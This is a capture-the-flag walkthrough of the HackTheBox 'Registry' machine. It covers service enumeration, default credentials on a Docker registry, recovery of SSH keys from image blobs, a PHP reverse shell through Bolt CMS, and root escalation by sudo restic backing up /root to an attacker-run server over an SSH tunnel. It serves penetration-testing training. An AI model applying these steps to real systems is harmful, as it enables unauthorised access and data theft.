Registry was a 40 pts box on HackTheBox and it was rated as “Hard”. It had a private docker registry that was protected with a common password allowing attackers to pull the docker image. Docker image had private ssh key for a user on the host. The box had also a CMS installed called Bolt, admin password of this CMS was crackable with a common wordlist. A downgrade of privileges was required because www-data was able to perform a backup operation with program called restic with root privileges. After backing up juicy files an attacker could obtain root user.
As always, I started with nmap
λ ~/Desktop/htb/machines/registry nmap -sVCS -T5 -oA nmap/initial 10.10.10.159
Ssl certificate revealed a subdomain
Added them to my /etc/hosts file
10.10.10.159 registry.htb docker.registry.htb
λ ~/Desktop/htb/machines/registry gobuster dir -u https://registry.htb/ -w /opt/SecLists/Discovery/Web-Content/common.txt -x php,html -t 50 -k
I got the links below from the first initial directory brute force
This endpoint didn’t seem like a normal html file, it seemed like a binary
I downloaded the index file of this endpoint to see what kind of file this is
Turned out it was a gzip file
Gzip file had ca certificate and a readme file.
λ ~/Desktop/htb/machines/registry/install cat readme.md
Readme helped me understand what was going on. At this point, I understood that it was a private docker registry and it was probably going to have some dockers that we can work with.
One of the common credentials admin:admin logged me in
And after this point it was pretty obvious that I will be getting the dockers from this endpoint.
I wanted to enumerate end point https://docker.registry.htb/v2 more
gobuster dir -u https://docker.registry.htb/v2 -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -t 50 -k
/_catalog (Status: 401)
Basic authorization was being used for authentication
λ ~/Desktop/htb/machines/registry curl -H "Authorization: Basic YWRtaW46YWRtaW4=" https://docker.registry.htb/v2/_catalog -k
This docker registry had an image named bolt-image
In order to pull the docker image installing ca certificate was necessary
This link below from the readme file explains pretty much everything
You can follow this link below to install docker on kali
service docker start
/root/.ssh/id_rsa was encrypted and it was for
I couldn’t crack it with a wordlist, so continued enumerating the image more, unfortunately there was nothing to crack it.
This link below explains the infrastructure pretty well.
A blob can be downloaded like the example below
I wrote a small script to extract all blobs
One of the blobs had the passphrase for ssh key
I decrypted ssh key for easier use
openssl rsa -in id_rsa -out id_rsa.decoded
I run linpeas at this point to have a better understanding of the server
There was another endpoint in the webserver which I couldn’t find in the initial enumeration
Linpeas extracted the values from tables on sqlite files and I got the admin hash
It got cracked with rockyou
We don’t have write permission under
After logging in one can upload files easily. However there are restrictions.
Luckily we are admin and we have control over the web application so we can modify configuration files easily.
Modified the config.yml file
I got shell as www-data with a simple php reverse shell
Checking for sudo entries is one of the first things I do when I get a user.
www-data had an entry with root privileges.
www-data@bolt:~$ sudo -l
Doing some research showed me that restic was a backup program and one can store their files in a backup server with it.
www-data can store any files of this host on any rest server, nice !
I set up a restic server on my kali.
You can use the link below
apt install restic
Forwarding port 8000 to remote was necessary to do the backup operation
ssh -i .ssh/id_rsa.decoded email@example.com -R 8000:127.0.0.1:8000
Make sure you have an interactive shell at this point as restic is going to ask you to enter the password.
sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8000/ /root
I restored the snapshot back
restic restore aea5ab4b940c530b9f0679d1da33fc7497958936308d8f9b0c50ebad735ed1b5 --target ~/Desktop/htb/machines/registry/root_backup -r ~/Desktop/htb/machines/registry/backup
After restoring snapshot, I saw the private ssh key for root, so lets use it.
And we are root !
Thanks to thek for this box.
Thank you for reading :)